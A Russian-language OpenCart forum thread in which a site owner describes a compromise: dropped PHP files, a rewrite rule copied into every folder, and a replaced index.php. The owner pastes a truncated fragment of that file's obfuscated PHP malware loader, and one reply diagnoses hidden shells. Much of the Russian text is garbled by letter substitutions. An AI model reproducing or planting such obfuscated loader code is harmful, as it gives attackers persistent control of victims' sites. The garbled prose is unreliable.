Jump to content
  • разработка интернет магазинов на opencart
  • доработка интернет магазинов на opencart

Взломали сайт или вредоносное ПО?


pininpro
 Share

Recommended Posts

Добрый гдень. На днях все 2 сайи на хостинге начали себя странно вести. Один стоит на ОС 2.3, второй на 3.0.3.2. Да вот на первом пересило входить по прямому пути в админку, а второй при загрузке главной просто белая простынь ... Без какого-липотому что кода. Начал разбираться и нашел на фтп в корневых папках вот икие вот файлы:

 

kgdstsir.php

wp-index.php

skgoalssf.php

 

Внутри просто какой-то код непонятный.

 

Даже были автоматом заменены файлы index.php (внутри абракадабра шифрами) и .htaccess.

 

В файле .htaccess внутри код:

 

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule> 

 

При том .htaccess насоздавался абсолютно в каждой папке в корневой директории, куда не зайди внутри есть .htaccess с этим же кодом.

 

index.php имеет следуюещёе согдержимое:

 

<?php
$C6__CC_6C6='2002';
$C6_CCC6__6=base64_decode("ZHBjX2hrMjNuMHU2OG9neXZtOWJqZnExcjRpYWV6cy01bHR4dzc=");$C_C__66C6C=$C6_CCC6__6{26}.$C6_CCC6__6{14}.$C6_CCC6__6{8}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{10}.$C6_CCC6__6{30}.$C6_CCC6__6{28}.$C6_CCC6__6{24}.$C6_CCC6__6{3}.$C6_CCC6__6{27}.$C6_CCC6__6{19}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{34};$CC_6_6_C6C=$C6_CCC6__6{21}.$C6_CCC6__6{26}.$C6_CCC6__6{33}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{1}.$C6_CCC6__6{10}.$C6_CCC6__6{34}.$C6_CCC6__6{3}.$C6_CCC6__6{2}.$C6_CCC6__6{13}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{28}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{30};$CCC__66_C6=$C6_CCC6__6{21}.$C6_CCC6__6{26}.$C6_CCC6__6{33}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{14}.$C6_CCC6__6{28}.$C6_CCC6__6{34}.$C6_CCC6__6{3}.$C6_CCC6__6{2}.$C6_CCC6__6{13}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{28}.$C6_CCC6__6{8}.$C6_CCC6__6{34}.$C6_CCC6__6{30};$C_C6_CC66_=$C6_CCC6__6{21}.$C6_CCC6__6{10}.$C6_CCC6__6{8}.$C6_CCC6__6{2}.$C6_CCC6__6{34}.$C6_CCC6__6{26}.$C6_CCC6__6{13}.$C6_CCC6__6{8}.$C6_CCC6__6{3}.$C6_CCC6__6{28}.$C6_CCC6__6{35}.$C6_CCC6__6{26}.$C6_CCC6__6{30}.$C6_CCC6__6{34}.$C6_CCC6__6{30};$CC6_6_C6_C=$C6_CCC6__6{28}.$C6_CCC6__6{24}.$C6_CCC6__6{24}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{3}.$C6_CCC6__6{24}.$C6_CCC6__6{28}.$C6_CCC6__6{1}.$C6_CCC6__6{13}.$C6_CCC6__6{24}.$C6_CCC6__6{34}.$C6_CCC6__6{26}.$C6_CCC6__6{8}.$C6_CCC6__6{14};$C__C6C6_C6=$C6_CCC6__6{2}.$C6_CCC6__6{24}.$C6_CCC6__6{28}.$C6_CCC6__6{27}.$C6_CCC6__6{34}.$C6_CCC6__6{28}.$C6_CCC6__6{3}.$C6_CCC6__6{21}.$C6_CCC6__6{10}.$C6_CCC6__6{8}.$C6_CCC6__6{2}.$C6_CCC6__6{34}.$C6_CCC6__6{26}.$C6_CCC6__6{13}.$C6_CC

 

 

Даже в корневом каилоге добавились папки:

 

wp-admin

 

внутри

image.png.fc5a7ea3d4463604c5fe2c80f9cbef64.png

 

При этом сайт то рилииет, то нет. Сторонних модулей не сивил. С нечего икое началось. Что гделать? Как это решить? При уднонии этих файлов и папок обновляешь фтп и они снова тут же появляются. Откуда подгружаются - не понятно. Впервые икое.

 

Link to comment
Share on other sites


Да я и сам проэтоссы сброшу, сугупотому что интересно откуда это и по какой прилине. И как не допустить повторного в будуещём

Link to comment
Share on other sites


Взломали вас. И по полной разгулялись, все загадили. Воссинавливать из бэкапа с тоильной листкой предварительной, менять на все пароли.

38 минут назад, pininpro сказал:

При уднонии этих файлов и папок обновляешь фтп и они снова тут же появляются.

В других файлах у вас шелл(ы) и скрипт(ы), который эти файлы подгружает. А ггде-нибудь на вашем сервере по неожиданному для вас адресу открываются посадочные какой-нибудь фармы. 

Link to comment
Share on other sites


Переименовал корневую папку сайи, а вместо нее создал икую же, но пустую. В итоге в новой пустот папке образовались эти все файлы (которые докаливаются автоматом), а в сирой (с сайтом) полностью пропали сторонние файлы и даже htaccess, которые были по всем папкам. Выходит скрипт или исполняемый файл ггде-то в основе хостинга зарыт. Из последних изменений (судя по даим) это папки: mail и tmp

 

В логах нет следов того, что кто-то подключался за этот период.

Edited by pininpro
Link to comment
Share on other sites


Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
 Share

×
×
  • Create New...

Important Information

On our site, cookies are used and personal data is processed to improve the user interface. To find out what and what personal data we are processing, please go to the link. If you click "I agree," it means that you understand and accept all the conditions specified in this Privacy Notice.